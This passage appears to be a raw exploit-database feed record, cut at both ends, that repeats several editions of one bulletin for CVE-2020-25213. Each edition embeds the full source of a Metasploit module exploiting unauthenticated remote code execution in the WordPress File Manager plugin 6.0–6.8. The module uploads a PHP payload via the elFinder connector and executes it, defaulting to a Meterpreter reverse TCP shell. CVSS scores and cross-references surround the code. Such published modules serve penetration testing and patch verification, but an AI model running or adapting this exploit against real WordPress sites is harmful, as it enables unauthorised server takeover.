"NONE", "modified": "2021-09-09T22:26:05", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/35215", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::HTTP::Wordpress\r\n prepend Msf::Exploit::Remote::AutoCheck\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(\r\n update_info(\r\n info,\r\n 'Name' => 'WordPress File Manager Unauthenticated Remote Code Execution',\r\n 'Description' => %q{\r\n The File Manager (wp-file-manager) plugin from 6.0 to 6.8 for WordPress allows remote attackers to upload and\r\n execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php\r\n extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write\r\n PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Alex Souza (w4fz5uck5)', # initial discovery and PoC\r\n 'Imran E. Dawoodjee <imran [at] threathounds.com>', # msf module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'URL', 'https://github.com/w4fz5uck5/wp-file-manager-0day' ],\r\n [ 'URL', 'https://www.tenable.com/cve/CVE-2020-25213' ],\r\n [ 'CVE', '2020-25213' ]\r\n ],\r\n 'Platform' => [ 'php' ],\r\n 'Privileged' => false,\r\n 'Arch' => ARCH_PHP,\r\n 'Targets' =>\r\n [\r\n [\r\n 'WordPress File Manager 6.0-6.8',\r\n {\r\n 'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' }\r\n }\r\n ]\r\n ],\r\n 'DisclosureDate' => '2020-09-09', # disclosure date on NVD, PoC was published on August 26 2020\r\n 'DefaultTarget' => 0\r\n )\r\n )\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [true, 'Base path to WordPress installation', '/']),\r\n OptEnum.new('COMMAND', [true, 'elFinder commands used to exploit the vulnerability', 'upload', %w[upload mkfile+put]])\r\n ]\r\n )\r\n end\r\n\r\n def check\r\n return CheckCode::Unknown unless wordpress_and_online?\r\n\r\n # check the plugin version from readme\r\n check_plugin_version_from_readme('wp-file-manager', '6.9', '6.0')\r\n end\r\n\r\n def exploit\r\n # base path to File Manager plugin\r\n file_manager_base_uri = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-file-manager')\r\n # filename of the file to be uploaded/created\r\n filename = \"#{Rex::Text.rand_text_alphanumeric(6)}.php\"\r\n register_file_for_cleanup(filename)\r\n\r\n case datastore['COMMAND']\r\n when 'upload'\r\n elfinder_post(file_manager_base_uri, 'upload', 'payload' => payload.encoded, 'filename' => filename)\r\n when 'mkfile+put'\r\n elfinder_post(file_manager_base_uri, 'mkfile', 'filename' => filename)\r\n elfinder_post(file_manager_base_uri, 'put', 'payload' => payload.encoded, 'filename' => filename)\r\n end\r\n\r\n payload_uri = normalize_uri(file_manager_base_uri, 'lib', 'files', filename)\r\n print_status(\"#{peer} - Payload is at #{payload_uri}\")\r\n # execute the payload\r\n send_request_cgi('uri' => normalize_uri(payload_uri))\r\n end\r\n\r\n # make it easier to switch between \"upload\" and \"mkfile+put\" exploit methods\r\n def elfinder_post(file_manager_base_uri, elfinder_cmd, opts = {})\r\n filename = opts['filename']\r\n\r\n # prep for exploit\r\n post_data = Rex::MIME::Message.new\r\n post_data.add_part(elfinder_cmd, nil, nil, 'form-data; name=\"cmd\"')\r\n\r\n case elfinder_cmd\r\n when 'upload'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, 'application/octet-stream', nil, \"form-data; name=\\\"upload[]\\\"; filename=\\\"#{filename}\\\"\")\r\n when 'mkfile'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(filename, nil, nil, 'form-data; name=\"name\"')\r\n when 'put'\r\n post_data.add_part(\"l1_#{Rex::Text.encode_base64(filename)}\", nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, nil, nil, 'form-data; name=\"content\"')\r\n end\r\n\r\n res = send_request_cgi(\r\n 'uri' => normalize_uri(file_manager_base_uri, 'lib', 'php', 'connector.minimal.php'),\r\n 'method' => 'POST',\r\n 'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\",\r\n 'data' => post_data.to_s\r\n )\r\n\r\n fail_with(Failure::Unreachable, \"#{peer} - Could not connect\") unless res\r\n fail_with(Failure::UnexpectedReply, \"#{peer} - Unexpected HTTP response code: #{res.code}\") unless res.code == 200\r\n end\r\nend\n\n# 0day.today [2021-09-11] #", "category": "", "verified": false}, "lastseen": "2021-09-10T22:12:40", "differentElements": ["sourceData"], "edition": 11}, {"bulletin": {"id": "1337DAY-ID-35215", "vendorId": null, "hash": "37775659b7139781c55469f1cfbb7d81", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress File Manager 6.8 Remote Code Execution Exploit", "description": "The WordPress File Manager (wp-file-manager) plugin versions 6.0 through 6.8 allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.", "published": "2020-11-10T00:00:00", "modified": "2020-11-10T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/35215", "reporter": "zdt", "references": [], "cvelist": ["CVE-2020-25213"], "immutableFields": [], "lastseen": "2021-09-11T22:45:21", "history": [], "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:AA7F75B5-85DC-4246-932B-C13A3A39B197"]}, {"type": "cve", "idList": ["CVE-2020-25213"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:160003"]}, {"type": "wpexploit", "idList": ["WPEX-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "nessus", "idList": ["WORDPRESS_PLUGIN_WP_FILE_MANAGER_6_9_RCE.NASL"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "dsquare", "idList": ["E-722"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:7D610378313C0D3F9F5525CC2D5907A7"]}, {"type": "thn", "idList": ["THN:7FD924637D99697D78D53283817508DA"]}], "modified": "2021-09-11T22:45:21", "rev": 2}, "score": {"value": 7.2, "vector": "NONE", "modified": "2021-09-11T22:45:21", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/35215", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::HTTP::Wordpress\r\n prepend Msf::Exploit::Remote::AutoCheck\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(\r\n update_info(\r\n info,\r\n 'Name' => 'WordPress File Manager Unauthenticated Remote Code Execution',\r\n 'Description' => %q{\r\n The File Manager (wp-file-manager) plugin from 6.0 to 6.8 for WordPress allows remote attackers to upload and\r\n execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php\r\n extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write\r\n PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Alex Souza (w4fz5uck5)', # initial discovery and PoC\r\n 'Imran E. Dawoodjee <imran [at] threathounds.com>', # msf module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'URL', 'https://github.com/w4fz5uck5/wp-file-manager-0day' ],\r\n [ 'URL', 'https://www.tenable.com/cve/CVE-2020-25213' ],\r\n [ 'CVE', '2020-25213' ]\r\n ],\r\n 'Platform' => [ 'php' ],\r\n 'Privileged' => false,\r\n 'Arch' => ARCH_PHP,\r\n 'Targets' =>\r\n [\r\n [\r\n 'WordPress File Manager 6.0-6.8',\r\n {\r\n 'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' }\r\n }\r\n ]\r\n ],\r\n 'DisclosureDate' => '2020-09-09', # disclosure date on NVD, PoC was published on August 26 2020\r\n 'DefaultTarget' => 0\r\n )\r\n )\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [true, 'Base path to WordPress installation', '/']),\r\n OptEnum.new('COMMAND', [true, 'elFinder commands used to exploit the vulnerability', 'upload', %w[upload mkfile+put]])\r\n ]\r\n )\r\n end\r\n\r\n def check\r\n return CheckCode::Unknown unless wordpress_and_online?\r\n\r\n # check the plugin version from readme\r\n check_plugin_version_from_readme('wp-file-manager', '6.9', '6.0')\r\n end\r\n\r\n def exploit\r\n # base path to File Manager plugin\r\n file_manager_base_uri = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-file-manager')\r\n # filename of the file to be uploaded/created\r\n filename = \"#{Rex::Text.rand_text_alphanumeric(6)}.php\"\r\n register_file_for_cleanup(filename)\r\n\r\n case datastore['COMMAND']\r\n when 'upload'\r\n elfinder_post(file_manager_base_uri, 'upload', 'payload' => payload.encoded, 'filename' => filename)\r\n when 'mkfile+put'\r\n elfinder_post(file_manager_base_uri, 'mkfile', 'filename' => filename)\r\n elfinder_post(file_manager_base_uri, 'put', 'payload' => payload.encoded, 'filename' => filename)\r\n end\r\n\r\n payload_uri = normalize_uri(file_manager_base_uri, 'lib', 'files', filename)\r\n print_status(\"#{peer} - Payload is at #{payload_uri}\")\r\n # execute the payload\r\n send_request_cgi('uri' => normalize_uri(payload_uri))\r\n end\r\n\r\n # make it easier to switch between \"upload\" and \"mkfile+put\" exploit methods\r\n def elfinder_post(file_manager_base_uri, elfinder_cmd, opts = {})\r\n filename = opts['filename']\r\n\r\n # prep for exploit\r\n post_data = Rex::MIME::Message.new\r\n post_data.add_part(elfinder_cmd, nil, nil, 'form-data; name=\"cmd\"')\r\n\r\n case elfinder_cmd\r\n when 'upload'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, 'application/octet-stream', nil, \"form-data; name=\\\"upload[]\\\"; filename=\\\"#{filename}\\\"\")\r\n when 'mkfile'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(filename, nil, nil, 'form-data; name=\"name\"')\r\n when 'put'\r\n post_data.add_part(\"l1_#{Rex::Text.encode_base64(filename)}\", nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, nil, nil, 'form-data; name=\"content\"')\r\n end\r\n\r\n res = send_request_cgi(\r\n 'uri' => normalize_uri(file_manager_base_uri, 'lib', 'php', 'connector.minimal.php'),\r\n 'method' => 'POST',\r\n 'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\",\r\n 'data' => post_data.to_s\r\n )\r\n\r\n fail_with(Failure::Unreachable, \"#{peer} - Could not connect\") unless res\r\n fail_with(Failure::UnexpectedReply, \"#{peer} - Unexpected HTTP response code: #{res.code}\") unless res.code == 200\r\n end\r\nend\n\n# 0day.today [2021-09-12] #", "category": "", "verified": false}, "lastseen": "2021-09-11T22:45:21", "differentElements": ["sourceData"], "edition": 12}, {"bulletin": {"id": "1337DAY-ID-35215", "vendorId": null, "hash": "c8a5fa5b347cccfdad6eb7929993cb08", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress File Manager 6.8 Remote Code Execution Exploit", "description": "The WordPress File Manager (wp-file-manager) plugin versions 6.0 through 6.8 allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.", "published": "2020-11-10T00:00:00", "modified": "2020-11-10T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/35215", "reporter": "zdt", "references": [], "cvelist": ["CVE-2020-25213"], "immutableFields": [], "lastseen": "2021-09-12T22:13:42", "history": [], "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:AA7F75B5-85DC-4246-932B-C13A3A39B197"]}, {"type": "cve", "idList": ["CVE-2020-25213"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:160003"]}, {"type": "wpexploit", "idList": ["WPEX-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "nessus", "idList": ["WORDPRESS_PLUGIN_WP_FILE_MANAGER_6_9_RCE.NASL"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "dsquare", "idList": ["E-722"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:7D610378313C0D3F9F5525CC2D5907A7"]}, {"type": "thn", "idList": ["THN:7FD924637D99697D78D53283817508DA"]}], "modified": "2021-09-11T22:45:21", "rev": 2}, "score": {"value": 7.2, "vector": "NONE", "modified": "2021-09-11T22:45:21", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/35215", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::HTTP::Wordpress\r\n prepend Msf::Exploit::Remote::AutoCheck\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(\r\n update_info(\r\n info,\r\n 'Name' => 'WordPress File Manager Unauthenticated Remote Code Execution',\r\n 'Description' => %q{\r\n The File Manager (wp-file-manager) plugin from 6.0 to 6.8 for WordPress allows remote attackers to upload and\r\n execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php\r\n extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write\r\n PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Alex Souza (w4fz5uck5)', # initial discovery and PoC\r\n 'Imran E. Dawoodjee <imran [at] threathounds.com>', # msf module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'URL', 'https://github.com/w4fz5uck5/wp-file-manager-0day' ],\r\n [ 'URL', 'https://www.tenable.com/cve/CVE-2020-25213' ],\r\n [ 'CVE', '2020-25213' ]\r\n ],\r\n 'Platform' => [ 'php' ],\r\n 'Privileged' => false,\r\n 'Arch' => ARCH_PHP,\r\n 'Targets' =>\r\n [\r\n [\r\n 'WordPress File Manager 6.0-6.8',\r\n {\r\n 'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' }\r\n }\r\n ]\r\n ],\r\n 'DisclosureDate' => '2020-09-09', # disclosure date on NVD, PoC was published on August 26 2020\r\n 'DefaultTarget' => 0\r\n )\r\n )\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [true, 'Base path to WordPress installation', '/']),\r\n OptEnum.new('COMMAND', [true, 'elFinder commands used to exploit the vulnerability', 'upload', %w[upload mkfile+put]])\r\n ]\r\n )\r\n end\r\n\r\n def check\r\n return CheckCode::Unknown unless wordpress_and_online?\r\n\r\n # check the plugin version from readme\r\n check_plugin_version_from_readme('wp-file-manager', '6.9', '6.0')\r\n end\r\n\r\n def exploit\r\n # base path to File Manager plugin\r\n file_manager_base_uri = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-file-manager')\r\n # filename of the file to be uploaded/created\r\n filename = \"#{Rex::Text.rand_text_alphanumeric(6)}.php\"\r\n register_file_for_cleanup(filename)\r\n\r\n case datastore['COMMAND']\r\n when 'upload'\r\n elfinder_post(file_manager_base_uri, 'upload', 'payload' => payload.encoded, 'filename' => filename)\r\n when 'mkfile+put'\r\n elfinder_post(file_manager_base_uri, 'mkfile', 'filename' => filename)\r\n elfinder_post(file_manager_base_uri, 'put', 'payload' => payload.encoded, 'filename' => filename)\r\n end\r\n\r\n payload_uri = normalize_uri(file_manager_base_uri, 'lib', 'files', filename)\r\n print_status(\"#{peer} - Payload is at #{payload_uri}\")\r\n # execute the payload\r\n send_request_cgi('uri' => normalize_uri(payload_uri))\r\n end\r\n\r\n # make it easier to switch between \"upload\" and \"mkfile+put\" exploit methods\r\n def elfinder_post(file_manager_base_uri, elfinder_cmd, opts = {})\r\n filename = opts['filename']\r\n\r\n # prep for exploit\r\n post_data = Rex::MIME::Message.new\r\n post_data.add_part(elfinder_cmd, nil, nil, 'form-data; name=\"cmd\"')\r\n\r\n case elfinder_cmd\r\n when 'upload'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, 'application/octet-stream', nil, \"form-data; name=\\\"upload[]\\\"; filename=\\\"#{filename}\\\"\")\r\n when 'mkfile'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(filename, nil, nil, 'form-data; name=\"name\"')\r\n when 'put'\r\n post_data.add_part(\"l1_#{Rex::Text.encode_base64(filename)}\", nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, nil, nil, 'form-data; name=\"content\"')\r\n end\r\n\r\n res = send_request_cgi(\r\n 'uri' => normalize_uri(file_manager_base_uri, 'lib', 'php', 'connector.minimal.php'),\r\n 'method' => 'POST',\r\n 'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\",\r\n 'data' => post_data.to_s\r\n )\r\n\r\n fail_with(Failure::Unreachable, \"#{peer} - Could not connect\") unless res\r\n fail_with(Failure::UnexpectedReply, \"#{peer} - Unexpected HTTP response code: #{res.code}\") unless res.code == 200\r\n end\r\nend\n\n# 0day.today [2021-09-13] #", "category": "", "verified": false}, "lastseen": "2021-09-12T22:13:42", "differentElements": ["sourceData"], "edition": 13}, {"bulletin": {"id": "1337DAY-ID-35215", "vendorId": null, "hash": "06cfaf45e934043ffe3876d5320bd961", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress File Manager 6.8 Remote Code Execution Exploit", "description": "The WordPress File Manager (wp-file-manager) plugin versions 6.0 through 6.8 allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.", "published": "2020-11-10T00:00:00", "modified": "2020-11-10T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/35215", "reporter": "zdt", "references": [], "cvelist": ["CVE-2020-25213"], "immutableFields": [], "lastseen": "2021-09-13T22:23:02", "history": [], "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:AA7F75B5-85DC-4246-932B-C13A3A39B197"]}, {"type": "cve", "idList": ["CVE-2020-25213"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:160003"]}, {"type": "wpexploit", "idList": ["WPEX-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "nessus", "idList": ["WORDPRESS_PLUGIN_WP_FILE_MANAGER_6_9_RCE.NASL"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "dsquare", "idList": ["E-722"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:7D610378313C0D3F9F5525CC2D5907A7"]}, {"type": "thn", "idList": ["THN:7FD924637D99697D78D53283817508DA"]}], "modified": "2021-09-11T22:45:21", "rev": 2}, "score": {"value": 7.2, "vector": "NONE", "modified": "2021-09-11T22:45:21", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/35215", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::HTTP::Wordpress\r\n prepend Msf::Exploit::Remote::AutoCheck\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(\r\n update_info(\r\n info,\r\n 'Name' => 'WordPress File Manager Unauthenticated Remote Code Execution',\r\n 'Description' => %q{\r\n The File Manager (wp-file-manager) plugin from 6.0 to 6.8 for WordPress allows remote attackers to upload and\r\n execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php\r\n extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write\r\n PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Alex Souza (w4fz5uck5)', # initial discovery and PoC\r\n 'Imran E. Dawoodjee <imran [at] threathounds.com>', # msf module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'URL', 'https://github.com/w4fz5uck5/wp-file-manager-0day' ],\r\n [ 'URL', 'https://www.tenable.com/cve/CVE-2020-25213' ],\r\n [ 'CVE', '2020-25213' ]\r\n ],\r\n 'Platform' => [ 'php' ],\r\n 'Privileged' => false,\r\n 'Arch' => ARCH_PHP,\r\n 'Targets' =>\r\n [\r\n [\r\n 'WordPress File Manager 6.0-6.8',\r\n {\r\n 'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' }\r\n }\r\n ]\r\n ],\r\n 'DisclosureDate' => '2020-09-09', # disclosure date on NVD, PoC was published on August 26 2020\r\n 'DefaultTarget' => 0\r\n )\r\n )\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [true, 'Base path to WordPress installation', '/']),\r\n OptEnum.new('COMMAND', [true, 'elFinder commands used to exploit the vulnerability', 'upload', %w[upload mkfile+put]])\r\n ]\r\n )\r\n end\r\n\r\n def check\r\n return CheckCode::Unknown unless wordpress_and_online?\r\n\r\n # check the plugin version from readme\r\n check_plugin_version_from_readme('wp-file-manager', '6.9', '6.0')\r\n end\r\n\r\n def exploit\r\n # base path to File Manager plugin\r\n file_manager_base_uri = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-file-manager')\r\n # filename of the file to be uploaded/created\r\n filename = \"#{Rex::Text.rand_text_alphanumeric(6)}.php\"\r\n register_file_for_cleanup(filename)\r\n\r\n case datastore['COMMAND']\r\n when 'upload'\r\n elfinder_post(file_manager_base_uri, 'upload', 'payload' => payload.encoded, 'filename' => filename)\r\n when 'mkfile+put'\r\n elfinder_post(file_manager_base_uri, 'mkfile', 'filename' => filename)\r\n elfinder_post(file_manager_base_uri, 'put', 'payload' => payload.encoded, 'filename' => filename)\r\n end\r\n\r\n payload_uri = normalize_uri(file_manager_base_uri, 'lib', 'files', filename)\r\n print_status(\"#{peer} - Payload is at #{payload_uri}\")\r\n # execute the payload\r\n send_request_cgi('uri' => normalize_uri(payload_uri))\r\n end\r\n\r\n # make it easier to switch between \"upload\" and \"mkfile+put\" exploit methods\r\n def elfinder_post(file_manager_base_uri, elfinder_cmd, opts = {})\r\n filename = opts['filename']\r\n\r\n # prep for exploit\r\n post_data = Rex::MIME::Message.new\r\n post_data.add_part(elfinder_cmd, nil, nil, 'form-data; name=\"cmd\"')\r\n\r\n case elfinder_cmd\r\n when 'upload'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, 'application/octet-stream', nil, \"form-data; name=\\\"upload[]\\\"; filename=\\\"#{filename}\\\"\")\r\n when 'mkfile'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(filename, nil, nil, 'form-data; name=\"name\"')\r\n when 'put'\r\n post_data.add_part(\"l1_#{Rex::Text.encode_base64(filename)}\", nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, nil, nil, 'form-data; name=\"content\"')\r\n end\r\n\r\n res = send_request_cgi(\r\n 'uri' => normalize_uri(file_manager_base_uri, 'lib', 'php', 'connector.minimal.php'),\r\n 'method' => 'POST',\r\n 'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\",\r\n 'data' => post_data.to_s\r\n )\r\n\r\n fail_with(Failure::Unreachable, \"#{peer} - Could not connect\") unless res\r\n fail_with(Failure::UnexpectedReply, \"#{peer} - Unexpected HTTP response code: #{res.code}\") unless res.code == 200\r\n end\r\nend\n\n# 0day.today [2021-09-14] #", "category": "", "verified": false}, "lastseen": "2021-09-13T22:23:02", "differentElements": ["sourceData"], "edition": 14}, {"bulletin": {"id": "1337DAY-ID-35215", "vendorId": null, "hash": "8969a584eecf8b2b8008fbedde70ca45", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress File Manager 6.8 Remote Code Execution Exploit", "description": "The WordPress File Manager (wp-file-manager) plugin versions 6.0 through 6.8 allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.", "published": "2020-11-10T00:00:00", "modified": "2020-11-10T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/35215", "reporter": "zdt", "references": [], "cvelist": ["CVE-2020-25213"], "immutableFields": [], "lastseen": "2021-09-14T22:17:45", "history": [], "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": 